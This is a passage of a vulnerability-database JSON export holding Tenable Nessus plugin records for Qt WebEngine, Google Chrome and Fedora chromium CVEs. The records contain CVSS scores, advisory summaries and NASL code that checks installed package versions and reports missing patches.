6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-21166", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T15:12:13", "description": "The remote host is affected by the vulnerability described in GLSA-202004-04 (Qt WebEngine: Arbitrary code execution)\n\n A use-after-free vulnerability has been found in the audio component of Qt WebEngine.\n Impact :\n\n A remote attacker could entice a user to open a specially crafted media file in an application linked against Qt 
WebEngine, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-02T00:00:00", "type": "nessus", "title": "GLSA-202004-04 : Qt WebEngine: Arbitrary code execution", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:qtwebengine", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202004-04.NASL", "href": "https://www.tenable.com/plugins/nessus/135115", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202004-04.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(135115);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-13720\");\n script_xref(name:\"GLSA\", value:\"202004-04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"GLSA-202004-04 : Qt WebEngine: Arbitrary code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202004-04\n(Qt WebEngine: Arbitrary code execution)\n\n A use-after-free vulnerability has been found in the audio component of\n Qt WebEngine.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file in an application linked against Qt WebEngine, possibly resulting in\n execution of arbitrary code with the privileges of the process or a\n Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202004-04\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Qt WebEngine users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-qt/qtwebengine-5.14.1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13720\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-qt/qtwebengine\", unaffected:make_list(\"ge 5.14.1\"), vulnerable:make_list(\"lt 5.14.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Qt WebEngine\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:14", "description": "The version of Google Chrome installed on the remote Windows host is prior to 89.0.4389.72. It is, therefore, affected by multiple vulnerabilities as referenced in the 2021_03_stable-channel-update-for-desktop advisory. 
Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "nessus", "title": "Google Chrome < 89.0.4389.72 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 8.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2022-05-10T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_89_0_4389_72.NASL", "href": "https://www.tenable.com/plugins/nessus/146948", "sourceData": 
"#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146948);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2020-27844\",\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n \"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n \"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0117-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Google Chrome < 89.0.4389.72 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 89.0.4389.72. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2021_03_stable-channel-update-for-desktop advisory. 
Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fc64b00e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1171049\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1170531\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1173702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1172054\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1111239\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1164846\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174582\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1177465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1161144\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1152226\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1166138\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1111646\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1152894\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1150810\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1154250\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1158010\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1146651\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1170584\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1173879\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://crbug.com/1174186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174943\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1175507\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1177875\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1182767\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1049265\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1105875\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1131929\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1100748\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1153445\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1155516\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1161739\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1165392\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1166091\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 89.0.4389.72 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27844\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21190\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/05\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'89.0.4389.72', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2023-01-11T14:44:28", "description": "The version of Google Chrome installed on the remote macOS host is prior to 89.0.4389.72. It is, therefore, affected by multiple vulnerabilities as referenced in the 2021_03_stable-channel-update-for-desktop advisory. 
Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "nessus", "title": "Google Chrome < 89.0.4389.72 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 8.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2022-05-10T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL", "href": "https://www.tenable.com/plugins/nessus/146949", "sourceData": 
(CVE-2021-21176)\n\n - Insufficient policy enforcement in Autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21177)\n\n - Inappropriate implementation in Compositing in Google Chrome on Linux and Windows prior to 89.0.4389.72\n allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21178)\n\n - Use after free in Network Internals in Google Chrome on Linux prior to 89.0.4389.72 allowed a remote\n attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21179)\n\n - Use after free in tab search in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21180)\n\n - Side-channel information leakage in autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21181)\n\n - Insufficient policy enforcement in navigations in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML\n page. (CVE-2021-21182)\n\n - Inappropriate implementation in performance APIs in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21183, CVE-2021-21184)\n\n - Insufficient policy enforcement in extensions in Google Chrome prior to 89.0.4389.72 allowed an attacker\n who convinced a user to install a malicious extension to obtain sensitive information via a crafted Chrome\n Extension. 
(CVE-2021-21185)\n\n - Insufficient policy enforcement in QR scanning in Google Chrome on iOS prior to 89.0.4389.72 allowed an\n attacker who convinced the user to scan a QR code to bypass navigation restrictions via a crafted QR code.\n (CVE-2021-21186)\n\n - Insufficient data validation in URL formatting in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to perform domain spoofing via IDN homographs via a crafted domain name. (CVE-2021-21187)\n\n - Use after free in Blink in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-21188)\n\n - Insufficient policy enforcement in payments in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21189)\n\n - Uninitialized data in PDFium in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain\n potentially sensitive information from process memory via a crafted PDF file. 
(CVE-2021-21190)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-4740239e28\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21190\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Fedora' >!< release) audit(AUDIT_OS_NOT, 'Fedora');\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Fedora');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Fedora 33', 'Fedora ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Fedora', cpu);\n\npkgs = [\n {'reference':'chromium-89.0.4389.90-3.fc33', 'release':'FC33', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if 
(!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:29:59", "description": "The version of Google Chrome installed on the remote macOS host is prior to 78.0.3904.87. It is, therefore, affected by multiple vulnerabilities as referenced in the 2019_10_stable-channel-update-for-desktop_31 advisory. \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-01T00:00:00", "type": "nessus", "title": "Google Chrome < 78.0.3904.87 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:google:chrome", "cpe:/o:apple:mac_os_x"], "id": "MACOSX_GOOGLE_CHROME_78_0_3904_87.NASL", "href": "https://www.tenable.com/plugins/nessus/130462", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130462);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"Google Chrome < 78.0.3904.87 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 78.0.3904.87. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2019_10_stable-channel-update-for-desktop_31 advisory. 
\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?03df45ca\");\n # https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?af3000b1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1013868\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1019226\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 78.0.3904.87 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13721\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security 
